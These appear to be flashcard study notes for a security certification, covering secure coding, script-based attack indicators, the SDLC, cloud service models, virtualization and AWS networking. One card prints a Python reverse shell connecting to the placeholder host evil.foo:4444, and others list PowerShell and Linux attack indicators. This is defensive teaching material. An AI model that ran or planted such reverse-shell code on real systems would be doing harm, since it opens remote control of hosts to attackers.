using a pre-built function to perform a database query. A stored procedure is a part of a database that executes a custom query. The procedure is supplied an input by the calling program and returns a predefined output for matched records. This can provide a more secure means of querying the database. Any stored procedures that are part of the database but not required by the application should be disabled.

 

Term

Unreachable Code and Dead Code 

Definition

Unreachable code is a part of application source code that can never be executed. For example, there may be a routine within a logic statement (If ... Then) that can never be called because the conditions that would call it can never be met. Dead code can be described as either code that is executed but has no effect on the program flow or code that will never be executed. For example, there may be code to perform a calculation, but the result is never stored as a variable or used to evaluate a condition.

 

This type of code may be introduced through carelessly reused code, or when a block of code is rewritten or changed. Unreachable and dead code should be removed from the application to forestall the possibility that it could be misused in some way. The presence of unreachable/dead code can indicate that the application is not being well maintained.

Term

Obfuscation/Camouflage 

Definition

It is important that code be well-documented, to assist the efforts of multiple programmers working on the same project. Well-documented code is also easier to analyze, however, which may assist the development of attacks. Code can be made difficult to analyze by using an obfuscator, which is software that randomizes the names of variables, constants, functions, and procedures, removes comments and white space, and performs other operations to make the compiled code physically and mentally difficult to read and follow. This sort of technique might be used to make reverse engineering an application more difficult and as a way of disguising malware code.

Term
 compiled code
Definition

Code that is converted from high-level programming language source code into lower-level code that can then be directly executed by the system.

 

Term

Static code analysis or source code analysis

The process of reviewing uncompiled source code either manually or using automated tools.

 

Definition
Static code analysis (or source code analysis) is performed against the application code before it is packaged as an executable process. The analysis software must support the programming language used by the source code. The software will scan the source code for signatures of known issues, such as OWASP Top 10 Most Critical Web Application Security Risks or injection vulnerabilities generally. The analysis tool will typically identify each line in a sequence of code that creates the vulnerability and provide generic remediation advice, such as ensuring that input for an SQL function is sanitized before use. 
Term
Dynamic analysis means that the application is tested under "real world" conditions using a staging environment. 
Definition
Term

Fuzzing
A dynamic code analysis technique that involves sending a running application random and unusual input so as to evaluate how the app responds.

 

Definition
Fuzzing is a means of testing that an application's input validation routines work well. Fuzzing means that the test or vulnerability scanner generates large amounts of deliberately invalid and/or random input and records the responses made by the application. 
Term

 "stress testing"
A software testing method that evaluates how software performs under extreme load.

 

Definition
Term

There are generally three types of fuzzers, representing different ways of injecting manipulated input into the application:

Definition
  • Application UI—identify input streams accepted by the application, such as input boxes, command line switches, or import/export functions.
  • Protocol—transmit manipulated packets to the application, perhaps using unexpected values in the headers or payload.
  • File format—attempt to open files whose format has been manipulated, perhaps manipulating specific features of the file.

    Fuzzers are also distinguished by the way in which they craft each input (or test case). The fuzzer may use semi-random input (dumb fuzzer) or might craft specific input based around known exploit vectors, such as escaped command sequences or character literals, or by mutating intercepted inputs.

    Associated with fuzzing is the concept of stress testing an application to see how an application performs under extreme performance or usage scenarios.

    Finally, the fuzzer needs some means of detecting an application crash and recording which input sequence generated the crash. 

Term
Python 
Definition

High-level programming language that is widely used for automation.

 

Term
PowerShell 
Definition

A command shell and scripting language built on the .NET Framework.

PowerShell is the preferred method of performing Windows administration tasks.The Get-Help cmdlet shows help on different elements of the PowerShell environment. PowerShell is case-insensitive.It has also become the Windows hacker's go-to toolkit. PowerShell statements can be executed at a PowerShell prompt, or run as a script (.ps1) on any PowerShell-enabled host.


 

 

Term
Execution control 

Definition

Execution control is the process of determining what additional software or scripts may be installed or run on a host beyond its baseline.

The process of determining what additional software may be installed on a client or server beyond its baseline to prevent the use of unauthorized software.

 

Term
Allow list 
Definition

It is likely that the company is using allow list control, and the software is not on the approved allow list. Any software not listed will be blocked from running.

 


A security configuration where access is generally permitted to any entity (software process, IP/domain, and so on) if the entity appears on a list.

  • Allow list is a highly restrictive policy that means only running authorized processes and scripts. Allowing only specific applications that have been added to a list will inevitably hamper users at some point and increase support time and costs. For example, a user might need to install a conferencing application at short notice.
Term
Block list
Definition

A security configuration where access is denied to any entity (software process, IP/domain, and so on) if the entity appears on the list.

 


is a permissive policy that only prevents execution of listed processes and scripts. It is vulnerable to software that has not previously been identified as malicious (or capable of or vulnerable to malicious use).

If the company was using a block list, the software would be able to run as long as it is not on the prohibited list. Block list only blocks software that has been listed.

 

Term

Code Signing

Definition

Code signing is the principal means of proving the authenticity and integrity of code (an executable or a script). The developer creates a cryptographic hash of the file then signs the hash using his or her private key. The program is shipped with a copy of the developer's code signing certificate, which contains a public key that the destination computer uses to read and verify the signature. The OS then prompts the user to choose whether to accept the signature and run the program.

Term
Shellcode
Definition
this is a minimal program designed to exploit a buffer overflow or similar vulnerability to gain privileges, or to drop a backdoor on the host if run as a Trojan. Having gained a foothold, this type of attack will be followed by some type of network connection to download additional tools.
Term
Credential dumping
Definition
the malware might try to access the credentials file (SAM on a local Windows workstation) or sniff credentials held in memory by the lsass.exe system process 
Term
Lateral movement/insider attack
Definition
the general procedure is to use the foothold to execute a process remotely, using a tool such as psexec or PowerShell  The attacker might be seeking data assets or may try to widen access by changing the system security configuration, such as opening a firewall port or creating an account. If the attacker has compromised an account, these commands can blend in with ordinary network operations, though they could be anomalous behavior for that account.
Term
Persistence
Definition

§  this is a mechanism that allows the threat actor's backdoor to restart if the host reboots or the user logs off . Typical methods are to use AutoRun keys in the registry, adding a scheduled task, or using Windows Management Instrumentation (WMI) event subscriptions.

 

 

Term
POWERSHELL MALICIOUS INDICATORS
Definition

There are numerous exploit frameworks to leverage PowerShell functionality, such as PowerShell Empire, PowerSploit, Metasploit, and Mimikatz.

Cmdlets such as Invoke-Expression, Invoke-Command, Invoke-WMIMethod, New-Service, Create-Thread, Start-Process, and New-Object can indicate an attempt to run some type of binary shellcode. This is particularly suspicious if combined with a DownloadString or DownloadFile argument. One complication is that cmdlets can be shortened, assisting obfuscation. For example, Invoke-Expression can be run using IEX.

 Using another type of script to execute the PowerShell is also suspicious. For example, the attacker might use JavaScript code embedded in a PDF to launch PowerShell via a vulnerable reader app.

Using system calls to the Windows API might indicate an attempt to inject a DLL or perform process hollowing, where the malicious code takes over a legitimate process:

Bypassing execution policy can also act as an indicator. The PowerShell code may be called as a Base64 encoded string (-enc argument) or may use the -noprofile or -ExecutionPolicy Bypass arguments.

Term

 Bourne Again Shell (Bash)
A command shell and scripting language for Unix-like systems.

 

Definition
Term
BASH AND PYTHON MALICIOUS INDICATORS
A malicious script running on a Linux host might attempt the following:
Definition

1.    Use commands such as whoami and ifconfig/ip/route to establish the local context.

2.    Download tools, possibly using wget or curl.

3.    Add crontab entries to enable persistence.

4.    Add a user with full sudo privileges and enable remote access via SSH.

5.    Change firewall rules using iptables.

 

6.    Use tools such as Nmap to scan for other hosts.

Term

reverse shell
A maliciously spawned remote command shell where the victim host opens the connection to the attacking host.

 

Definition
Term
BASH AND PYTHON MALICIOUS INDICATORS
Definition

A very common vector for attacking Linux hosts is to use an exploit to install a web shell as a backdoor  Typical code to implement a reverse shell (connecting out to the machine at evil.foo on port 4444) is as follows:

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)

s.connect(("evil.foo",4444))

os.dup2(s.fileno(),0)

os.dup2(s.fileno(),1)

os.dup2(s.fileno(),2)

pty.spawn("/bin/sh")'

The os.dup2 statements redirect the terminal's data streams stdin (0), stdout (1), and stderr (2) to the socket object (s). The pty module provides a library of functions for managing a pseudo-terminal, in this case starting the shell process at /bin/sh.

The code to implement a shell can be obfuscated in numerous ways. One way to identify malicious scripts trying to match code samples is to scan the file system against a configuration baseline, either using file integrity monitoring or use of the Linux diff command. 

A common exploit for a vulnerable web server is to upload a cryptominer, misusing the server's CPU resources to try to obtain new cryptocurrency. You can use Linux utilities such as top and free to diagnose excessive CPU and memory resource consumption by such malware.

Term
Visual Basic for Applications (VBA) 
Definition

Programming languages used to implement macros and scripting in Office document automation.


Microsoft Office uses the Visual Basic for Applications (VBA) language, while PDF documents use JavaScript. Microsoft Office document macros can be inspected using ALT+F11. Other vendors and open-source software also implement macro functionality, using languages such as Basic or Python.

A malicious actor will try to use a macro-enabled document to execute arbitrary code. For example, a Word document could be the vector for executing a malicious PowerShell script. Macros are disabled by default in Office, but the attacker may be able to use a social engineering attack to get the user to change the policy.

 

Term
man-in-the-browser (MitB)
Definition

An attack when the web browser is compromised by installing malicious plug-ins or scripts, or intercepting API calls between the browser process and DLLs.

 


man-in-the-browser (MitB) attack is a specific type of on-path attack where the web browser is compromised. Depending on the level of privilege obtained, the attacker may be able to inspect session cookies, certificates, and data, change browser settings, perform redirection, and inject code.

Term
Automation
Definition

Using scripts and APIs to provision and deprovision systems without manual intervention.

Automation is the completion of an administrative task without human intervention. Task automation steps may be configurable through a GUI control panel, via a command line, or via an API called by scripts. Tasks can be automated to provision resources, add accounts, assign permissions, perform incident detection and response, and any number of other network security tasks.

 

Term
Scalability
Definition

The property by which a computing environment is able to gracefully fulfill its ever-increasing resource needs.


 means that the costs involved in supplying the service to more users are linear. For example, if the number of users doubles in a scalable system, the costs to maintain the same level of service would also double (or less than double). If costs more than double, the system is less scalable.

Term
Elasticity
Definition

The property by which a computing environment can instantly react to both increasing and decreasing demands in workload.

refers to the system's ability to handle changes on demand in real time. A system with high elasticity will not experience loss of service or performance if demand suddenly doubles (or triples, or quadruples). Conversely, it may be important for the system to be able to reduce costs when demand is low. Elasticity is a common selling point for cloud services. Instead of running a cloud resource for 24 hours a day, 7 days a week, that resource can diminish in power or shut down completely when demand for that resource is low. When demand picks up again, the resource will grow in power to the level required. This results in cost-effective operations.

 

Term

software development life cycle (SDLC)

 

 

Definition

The processes of planning, analysis, design, implementation, and maintenances that often govern software and systems development.

 


 
software development life cycle (SDLC) divides the creation and maintenance of software into discrete phases. There are two principal SDLCs: the waterfall model and Agile development. Both these models stress the importance of requirements analysis and quality processes to the success of development projects.

Term
waterfall model
Definition

A software development model where the phases of the SDLC cascade so that each phase will start only when all tasks identified in the previous phase are complete.

 

Term
 Agile development
Definition

A software development model that focuses on iterative and incremental development to account for evolving requirements and expectations.

 

Agile development flips the waterfall model by iterating through phases concurrently on smaller modules of code.  In this model, development and provisioning tasks are conceived as continuous.

 

Term
 quality assurance (QA)
Definition

Policies, procedures, and tools designed to ensure defect-free development and delivery.

 


Quality processes are how an organization tests a system to identify whether it complies with a set of requirements and expectations. These requirements and expectations can be driven by risk-based assessments, or they can be driven by internal and external compliance factors, such as industry regulations and company-defined quality standards.
Quality control (QC) is the process of determining whether a system is free from defects or deficiencies. QC procedures are themselves defined by a quality assurance (QA) process, which analyzes what constitutes "quality" and how it can be measured and checked.

Term
Development
Definition
the code will be hosted on a secure server. Each developer will check out a portion of code for editing on his or her local machine. The local machine will normally be configured with a sandbox for local testing. This ensures that whatever other processes are being run locally do not interfere with or compromise the application being developed.
Term
Test/integration
Definition
in this environment, code from multiple developers is merged to a single master copy and subjected to basic unit and functional tests (either automated or by human testers) and to integration and regression tests. Unit tests ensure that the code builds correctly and that individual functions return the expected outputs. Integration and regression testing ensure that processes fulfill the functions required by the design and that changes do not break previously tested functionality.
Term
Staging
Definition

In software development, a user acceptance testing environment that is a copy of the production environment

this is a mirror of the production environment but may use test or sample data and will have additional access controls so that it is only accessible to test users. Testing at this stage will focus more on usability and performance..

 

Term
Production 
Definition
the application is released to end users.
Term
Sandboxing
Definition
each development environment should be segmented from the others. No processes should be able to connect to anything outside the sandbox. Only the minimum tools and services necessary to perform code development and testing should be allowed in each sandbox.
Term
Secure configuration baseline 
Definition
each development environment should be built to the same specification, possibly using automated provisioning. Repeatability is a key principle in software development. This means that a build will work in the same way in different contexts, such as the developer’s workstation and the production server.
Term
Integrity measurement
Definition
this process determines whether the development environment varies from the configuration baseline. Perhaps a developer added an unauthorized tool to solve some programming issue. Integrity measurement may be performed by scanning for unsigned files or files that do not otherwise match the baseline. The Linux diff command can be used to compare file structures
Term
Provisioning
Definition

The process of deploying an application to the target environment, such as enterprise desktops, mobile devices, or cloud infrastructure.

An enterprise provisioning manager might assemble multiple applications in a package. Alternatively, the OS and applications might be defined as a single instance for deployment on a virtualized platform. The provisioning process must account for changes to any of these applications so that packages or instances are updated with the latest version.

Term
Deprovisioning
Definition

The process of removing an application from packages or instances.

Deprovisioning is the process of removing an application from packages or instances. This might be necessary if software has to be completely rewritten or no longer satisfies its purpose. As well as removing the application itself, it is also important to make appropriate environment changes to remove any configurations (such as open firewall ports) that were made just to support that application.

Term
Version control
Definition

The practice of ensuring that the assets that make up a project are closely managed when it comes time to make changes.

Version control is an ID system for each iteration of a software product. Most version control numbers represent both the version, as made known to the customer or end user, and internal build numbers for use in the development process. Version control supports the change management process for software development projects. Software development environments such as Git (git-scm.com) use a repository server to maintain previous versions of the source code. When a developer commits new or changed code to the repository, the new source code is tagged with an updated version number and the old version archived. This allows changes to be rolled back if a problem is discovered.

Term
Continuous integration (CI)
Definition

Software development method in which code updates are tested and committed to a development or build server/code repository rapidly.



Continuous integration (CI) is the principle that developers should commit and test updates often—every day or sometimes even more frequently. This is designed to reduce the chances of two developers spending time on code changes that are later found to conflict with one another. CI aims to detect and resolve these conflicts early, as it is easier to diagnose one or two conflicts or build errors than it is to diagnose the causes of tens of them. For effective CI, it is important to use an automated test suite to validate each build quickly.

Term
continuous delivery
Definition

Software development method in which app and platform requirements are frequently tested and validated for immediate availability.

 

Where CI is about managing code in development, continuous delivery is about testing all of the infrastructure that supports the app, including networking, database functionality, client software, and so on.

Term
continuous deployment
Definition

Software development method in which app and platform updates are committed to production rapidly.

Where continuous delivery tests that an app version and its supporting infrastructure are ready for production, continuous deployment is the separate process of actually making changes to the production environment to support the new app version.

 

Term
 continuous monitoring
Definition

The technique of constantly evaluating an environment for changes so that new risks may be more quickly detected and business operations improved upon.

An automation solution will have a system of continuous monitoring to detect service failures and security incidents. Continuous monitoring might use a locally installed agent or heartbeat protocol or may involve checking availability remotely. As well as monitoring the primary site, it is important to observe the failover components to ensure that they are recovery ready. You can also automate the courses of action that a monitoring system takes, like configuring an IPS to automatically block traffic that it deems suspicious. This sort of capability is provided by security orchestration, automation, and response (SOAR) management software.

 

Term

Continuous Validation

Definition

An application model is a statement of the requirements driving the software development project. The requirements model is tested using processes of verification and validation (V&V):

§  Verification is a compliance testing process to ensure that the product or system meets its design goals.

§  Validation is the process of determining whether the application is fit-for-purpose (so for instance, its design goals meet the user requirements).

 

With the continuous paradigm, feedback from delivery and deployment must be monitored and evaluated to ensure that the design goals continue to meet user and security requirements. The monitoring and validation processes must also ensure that there is no drift from the secure configuration baseline.

Term
SOFTWARE DIVERSITY
Definition

Software diversity can refer to obfuscation techniques to make code difficult to detect as malicious. This can be used as a defensive technique. Obfuscating API methods and automation code makes it harder for a threat actor to reverse engineer and analyze the code to discover weaknesses.

There is also general research interest in security by diversity. This works on the principle that attacks are harder to develop against nonstandard environments.Using a wide range of development tools and OS/application vendors and versions can make attack strategies harder to research. As with security by obscurity, this will not defeat a targeted attack, but it can partially mitigate risks from less motivated threat actors, who will simply move to the next, easier target.

Term
stack overflow
Definition

One of the most common vulnerabilities is a stack overflow. The stack is an area of memory used by a program subroutine. It includes a return address, which is the location of the program that has called the subroutine. An attacker could use a buffer overflow to change the return address, allowing the attacker to run arbitrary code on the system. 

Term
SameSite Cookie
Definition

Cookies can be a vector for session hijacking and data exposure if not configured correctly. Use the SameSite attribute to control where a cookie may be sent, mitigating request forgery attacks.

 

Term
 cloud deployment model 
Definition

Classifying the ownership and management of a cloud as public, private, community, or hybrid.

cloud deployment model classifies how the service is owned and provisioned. It is important to recognize the different impacts deployment models have on threats and vulnerabilities

 

Term
Public (or multi-tenant)
Definition

A cloud that is deployed for shared use by multiple independent tenants.

a service offered over the Internet by cloud service providers (CSPs) to cloud consumers. With this model, businesses can offer subscriptions or pay-as-you-go financing, while at the same time providing lower-tier services free of charge. As a shared resource, there are risks regarding performance and security. 

 

Term
cloud service providers (CSPs)  
Definition

A vendor offering public cloud service models, such as PaaS, IaaS, or SaaS.

 

Term
 Multi-cloud
Definition

A cloud deployment model where the cloud consumer uses multiple public cloud services.

 

Term
Hosted Private
Definition

§  hosted by a third-party for the exclusive use of the organization. This is more secure and can guarantee a better level of performance but is correspondingly more expensive.

Term
Private
Definition

A cloud that is deployed for use by a single entity.

cloud infrastructure that is completely private to and owned by the organization. In this case, there is likely to be one business unit dedicated to managing the cloud while other business units make use of it. With private cloud computing, organizations can exercise greater control over the privacy and security of their services. This type of delivery method is geared more toward banking and governmental services that require strict access control in their operations.

 

Term
cloud computing
Definition

A method of computing that involves realtime communication over large distributed networks to provide the resources, software, data, and media needs of a user, business, or organization.

 

Term
Community 
Definition

A cloud that is deployed for shared use by cooperating tenants.


this is where several organizations share the costs of either a hosted private or fully private cloud. This is usually done in order to pool resources for a common concern, like standardization and security policies.

Term
cloud services 
Definition

Classifying the provision of cloud services and the limit of the cloud service provider's responsibility as software, platform, infrastructure, and so on.

 

Term
 anything as a service (XaaS)
Definition

Expressing the concept that most types of IT requirements can be deployed as a cloud service model.

 

Term
Infrastructure as a service (IaaS)
Definition

A computing method that uses the cloud to provide any or all infrastructure needs.

Infrastructure as a service (IaaS) is a means of provisioning IT resources such as servers, load balancers, and storage area network (SAN) components quickly. Rather than purchase these components and the Internet links they require, you rent them on an as-needed basis from the service provider's data center. Examples include Amazon Elastic Compute Cloud  Microsoft Azure Virtual Machines  Oracle Cloud  and OpenStack 

 

Term
Software as a service (SaaS)
Definition

A computing method that uses the cloud to provide application services to users.

 

Software as a service (SaaS) is a different model of provisioning software applications. Rather than purchasing software licenses for a given number of seats, a business would access software hosted on a supplier's servers on a pay-as-you-go or lease arrangement (on-demand). Virtual infrastructure allows developers to provision on-demand applications much more quickly than previously. The applications can be developed and tested in the cloud without the need to test and deploy on client computers. Examples include Microsoft Office 365  Salesforce and Google G Suite



Term
Platform as a service (PaaS) 
Definition

A computing method that uses the cloud to provide any platform-type services.

Platform as a service (PaaS) provides resources somewhere between SaaS and IaaS. A typical PaaS solution would provide servers and storage network infrastructure (as per IaaS) but also provide a multi-tier web application/database platform on top. This platform could be based on Oracle or MS SQL or PHP and MySQL. Examples include Oracle Database ,Microsoft Azure SQL Database, and Google App Engine.

 

As distinct from SaaS though, this platform would not be configured to actually do anything. Your own developers would have to create the software (the CRM or e‑commerce application) that runs using the platform. The service provider would be responsible for the integrity and availability of the platform components, but you would be responsible for the security of the application you created on the platform.

 

Term
Managed Security Services Provider (MSSP)
Definition

Third-party provision of security configuration and monitoring as an outsourced service.

a means of fully outsourcing responsibility for information assurance to a third party. This type of solution is expensive but can be a good fit for a SMB that has experienced rapid growth and has no in-house security capability. Of course, this type of outsourcing places a huge amount of trust in the MSSP. Maintaining effective oversight of the MSSP requires a good degree of internal security awareness and expertise. There could also be significant challenges in industries exposed to high degrees of regulation in terms of information processing.

 

Term
Security as a Service (SECaaS)
Definition

A computing method that enables clients to take advantage of information, software, infrastructure, and processes provided by a cloud vendor in the specific area of computer security.

can mean lots of different things, but is typically distinguished from an MSSP as being a means of implementing a particular security control, such as virus scanning or SIEM-like functionality, in the cloud. Typically, there would be a connector to the cloud service installed locally. For example, an antivirus agent would scan files locally but be managed and updated from the cloud provider; similarly a log collector would submit events to the cloud service for aggregation and correlation. Examples include Cloudflare, Mandiant/FireEye , and SonicWall. 

 

 

Term
Virtualization
Definition

The process of creating a simulation of a computing environment, where the virtualized system can simulate the hardware, operating system, and applications of a typical computer without being a separate physical computer.?

Virtualization means that multiple operating systems can be installed and run simultaneously on a single computer

 

  • Host hardware—the platform that will host the virtual environment. Optionally, there may be multiple hosts networked together.
  • Hypervisor/Virtual Machine Monitor (VMM)—manages the virtual machine environment and facilitates interaction with the computer hardware and network.
  • Guest operating systems, Virtual Machines (VM), or instances—operating systems installed under the virtual environment.
Term
Type II hypervisor
 [image]
Definition

In a guest OS (or host-based) system, the hypervisor application (known as a Type II hypervisor) is itself installed onto a host operating system. Examples of host-based hypervisors include VMware Workstation, Oracle Virtual Box, and Parallels Workstation. The hypervisor software must support the host OS.

Term
Type I hypervisor
bare metal virtual platform
 [image]
Definition

A bare metal virtual platform means that the hypervisor (Type I hypervisor) is installed directly onto the computer and manages access to the host hardware without going through a host OS. Examples include VMware ESXi Server, Microsoft's Hyper-V, and Citrix's XEN Server. The hardware needs only support the base system requirements for the hypervisor plus resources for the type and number of guest OSes that will be installed.

Term
Virtual desktop infrastructure (VDI) 
Definition

A virtualization implementation that separates the personal computing environment from a user's physical computer.

Virtual desktop infrastructure (VDI) refers to using a VM as a means of provisioning corporate desktops. In a typical VDI, desktop computers are replaced by low-spec, low-power thin client computers. When the thin client starts, it boots a minimal OS, allowing the user to log on to a VM stored on the company server infrastructure. The user makes a connection to the VM using some sort of remote desktop protocol (Microsoft Remote Desktop or Citrix ICA, for instance). The thin client has to find the correct image and use an appropriate authentication mechanism. There may be a 1:1 mapping based on machine name or IP address or the process of finding an image may be handled by a connection broker.

 

Term
virtual desktop environment (VDE)
Definition

The user desktop and software applications provisioned as an instance under VDI.

All application processing and data storage in the virtual desktop environment (VDE) or workspace is performed by the server. The thin client computer must only be powerful enough to display the screen image, play audio, and transfer mouse, key commands and video, and audio information over the network. All data is stored on the server, so it is easier to back up and the desktop VMs are easier to support and troubleshoot. They are better "locked" against unsecure user practices because any changes to the VM can easily be overwritten from the template image. With VDI, it is also easier for a company to completely offload their IT infrastructure to a third-party services company.

 

The main disadvantage is that in the event of a failure in the server and network infrastructure, users have no local processing ability, so downtime events may be more costly in terms of lost productivity.

 

Term
VM escaping 
Definition

An attack where malware running in a VM is able to interact directly with the hypervisor or host kernel.

 

Term
 VM sprawl
Definition

Configuration vulnerability where provisioning and deprovisioning of virtual assets is not properly authorized and monitored.

 

Term

Application Security and IAM

Definition
Term
Principals (SECRET KEY)
Definition

§  Principalsuser accounts, security groups, roles, and services—can interact with cloud services via CLIs and APIs. Such programmatic access is enabled by assigning a secret key to the account. Only the secret key (not the ordinary account credential) can be used for programmatic access. When a secret key is generated for an account, it must immediately be transferred to the host and kept securely on that host.

Term
 compute  
Definition

In cloud architecture, the resources that provide processing functionality and services, often in the context of an isolated container or VM.

 

Term

 

Container Security 

Definition

A container uses many shared components on the underlying platform, meaning it must be carefully configured to reduce the risk of data exposure. In a container engine such as Docker, each container is isolated from others through separate namespaces and control groups  Namespaces prevent one container reading or writing processes in another, while control groups ensure that one container cannot overwhelm others in a DoS-type attack. 

Term

API Inspection and Integration

Definition

§  Number of requeststhis basic load metric counts number of requests per second or requests per minute. Depending on the service type, you might be able to establish baselines for typical usage and set thresholds for alerting abnormal usage. An unexplained spike in API calls could be an indicator of a DDoS attack, for instance.

§  Latency—this is the time in milliseconds (ms) taken for the service to respond to an API call. This can be measured for specific services or as an aggregate value across all services. High latency usually means that compute resources are insufficient. The cause of this could be genuine load or DDoS, however.

§  Error rates—this measures the number of errors as a percentage of total calls, usually classifying error types under category headings. Errors may represent an overloaded system if the API is unresponsive, or a security issue, if the errors are authorization/access denied types.

 

§  Unauthorized and suspicious endpointsconnections to the API can be managed in the same sort of way as remote access. The client endpoint initiating the connection can be restricted using an ACL and the endpoint's IP address monitored for geographic location.

Term

 

Instance Awareness

Definition

As with on-premises virtualization, it is important to manage instances (virtual machines and containers) to avoid sprawl, where undocumented instances are launched and left unmanaged. As well as restricting rights to launch instances, you should configure logging and monitoring to track usage.

Term

 

Permissions and Resource Policies

Definition
As with on-premises systems, cloud storage resources must be configured to allow reads and/or writes only from authorized endpoints. In the cloud, a resource policy acts as the ACL for an object. In a resource policy, permissions statements are typically written as JavaScript Object Notation (JSON) strings. Misconfiguration of these resource policies is a widely exploited attack vector
Term

Encryption

Definition

Cloud storage encryption equates to the on-premises concept of full disk encryption (FDE). The purpose is to minimize the risk of data loss via an insider or intruder attack on the CSP's storage systems. Each storage unit is encrypted using an AES key. If an attacker were to physically access a data center and copy or remove a disk, the data on the disk would not be readable.

To read or write the data, the AES key must be available to the VM or container using the storage object. With CSP-managed keys, the cloud provider handles this process by using the access control rights configured on the storage resource to determine whether access is approved and, if so, making the key available to the VM or container. The key will be stored in a hardware security module (HSM) within the cloud. The HSM and separation of duties policies protect the keys from insider threat. Alternatively, customers can manage keys themselves, taking on all responsibility for secure distribution and storage.

Encryption can also be applied at other levels. For example, applications can selectively encrypt file system objects or use database-level encryption to encrypt fields and/or records. All networking—whether customer to cloud or between VMs/containers within the cloud—should use encrypted protocols such as HTTPS or IPSec.

 

 

Term

HIGH AVAILABILITY

Definition

One of the benefits of the cloud is the potential for providing services that are resilient to failures at different levels, such as component, server, local network, site, data center, and wide area network. The CSP uses a virtualization layer to ensure that compute, storage, and network provision meet the availability criteria set out in its SLA. In terms of storage performance tiers, high availability (HA) refers to storage provisioned with a guarantee of 99.99% uptime or better. As with on-premises architecture, the CSP uses redundancy to make multiple disk controllers and storage devices available to a pool of storage resource. Data may be replicated between pools or groups, with each pool supported by separate hardware resources.

Term
 replication 
Definition

Automatically copying data between two processing systems either simultaneously on both systems (synchronous) or from a primary to a secondary location (asynchronous).

 

Term

High Availability across Zones

Definition

CSPs divide the world into regions. Each region is independent of the others. The regions are divided into availability zones. The availability zones have independent data centers with their own power, cooling, and network connectivity. You can choose to host data, services, and VM instances in a particular region to provide a lower latency service to customers. Provisioning resources in multiple zones and regions can also improve performance and increases redundancy, but requires an adequate level of replication performance.

Consequently, CSPs offer several tiers of replication representing different high availability service levels:

§  Local replication—replicates your data within a single data center in the region where you created your storage account. The replicas are often in separate fault domains and update domains.

§  Regional replication (also called zone-redundant storage)—replicates your data across multiple data centers within one or two regions. This safeguards data and access in the event a single data center is destroyed or goes offline.

 

§  Geo-redundant storage (GRS)—replicates your data to a secondary region that is distant from the primary region. This safeguards data in the event of a regional outage or a disaster.

Term
 virtual private clouds (VPCs)
Definition

A private network segment made available to a single cloud consumer on a public cloud.

Each customer can create one or more virtual private clouds (VPCs) attached to their account. By default, a VPC is isolated from other CSP accounts and from other VPCs operating in the same account. This means that customer A cannot view traffic passing over customer B's VPC. The workload for each VPC is isolated from other VPCs. Within the VPC, the cloud consumer can assign an IPv4 CIDR block and configure one or more subnets within that block. Optionally, an IPv6 CIDR block can be assigned also. 

 

Term

Public and Private Subnets 

Definition

Each subnet within a VPC can either be private or public. To configure a public subnet, first an Internet gateway (virtual router) must be attached to the VPC configuration. Secondly, the Internet gateway must be configured as the default route for each public subnet. If a default route is not configured, the subnet remains private, even if an Internet gateway is attached to the VPC. Each instance in the subnet must also be configured with a public IP in its cloud profile. The Internet gateway performs 1:1 network address translation (NAT) to route Internet communications to and from the instance. 

There are other ways to provision external connectivity for a subnet if it is not appropriate to make it public:

§  NAT gateway—this feature allows an instance to connect out to the Internet or to other services in AWS, but does not allow connections initiated from the Internet.

 

§  VPN—there are various options for establishing connections to and between VPCs using virtual private networks (VPNs) at the software layer or using CSP-managed features.

Term
 transit gateway
Definition

In cloud computing, a virtual router deployed to facilitate connections between VPC subnets and VPN gateways.


. A transit gateway is a simpler means of managing these interconnections. Essentially, a transit gateway is a virtual router that handles routing between the subnets in each attached VPC and any attached VPN gateways

Term
VPC ENDPOINTS
Definition

 

A VPC endpoint is a means of publishing a service so that it is accessible by instances in other VPCs using only the AWS internal network and private IP addresses . This means that the traffic is never exposed to the Internet. There are two types of VPC endpoint: gateway and interface.

Term

Gateway Endpoints

Definition

 

A gateway endpoint is used to connect instances in a VPC to the AWS S3 (storage) and DynamoDB (database) services. A gateway endpoint is configured as a route to the service in the VPC's route table.

Term

Interface Endpoints

Definition

An interface endpoint makes use of AWS's PrivateLink feature to allow private access to custom services:

§  A custom service provider VPC is configured by publishing the service with a DNS host name. Alternatively, the service provider might be an Amazon default service that is enabled as a VPC interface endpoint, such as CloudWatch Events/Logs.

§  A VPC endpoint interface is configured in each service consumer VPC subnet. The VPC endpoint interface is configured with a private IP address within the subnet plus the DNS host name of the service provider.

 

§  Each instance within the VPC subnet is configured to use the endpoint address to contact the service provider.

Term
SECURITY GROUPS 
Definition

In AWS, basic packet filtering rules managing traffic that each instance will accept can be managed through security groups (docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html). A security group provides stateful inbound and outbound filtering at layer 4. The stateful filtering property means that it will allow established and related traffic if a new connection has been accepted.

The default security group allows any outbound traffic and any inbound traffic from instances also bound to the default security group. A custom security group sets the ports and endpoints that are allowed for inbound and outbound traffic. There are no deny rules for security groups; any traffic that does not match an allow rule is dropped. Consequently, a custom group with no rules will drop all network traffic. Multiple instances can be assigned to the same security group, and instances within the same subnet can be assigned to different security groups. You can assign multiple security groups to the same instance. You can also assign security groups to VPC endpoint interfaces.

[image]

Adding a custom security group when launching a new instance in AWS EC2. This policy allows SSH access from a single IP address (redacted) and access to HTTPS from any IP address. (Screenshot courtesy of Amazon.com)

Most cloud providers support similar filtering functionality, though they may be implemented differently. For example, in Azure, network security groups can be applied to network interfaces or to subnets

Term
cloud access security broker (CASB)
Definition

Enterprise management software designed to mediate access to cloud services by users across all types of devices.

CASBs provide you with visibility into how clients and other network nodes are using cloud services. Some of the functions of a CASB are:

§  Enable single sign-on authentication and enforce access controls and authorizations from the enterprise network to the cloud provider.

§  Scan for malware and rogue or non-compliant device access.

§  Monitor and audit user and resource activity.

 

§  Mitigate data exfiltration by preventing access to unauthorized cloud services from managed devices.

 

Term
In general, CASBs are implemented in one of three ways:
Definition
  • Forward proxy—this is a security appliance or host positioned at the client network edge that forwards user traffic to the cloud network if the contents of that traffic comply with policy. This requires configuration of users' devices or installation of an agent. In this mode, the proxy can inspect all traffic in real time, even if that traffic is not bound for sanctioned cloud applications. The problem with this mode is that users may be able to evade the proxy and connect directly. Proxies are also associated with poor performance as without a load balancing solution, they become a bottleneck and potentially a single point of failure.
  • Reverse proxy—this is positioned at the cloud network edge and directs traffic to cloud services if the contents of that traffic comply with policy. This does not require configuration of the users' devices. This approach is only possible if the cloud application has proxy support.
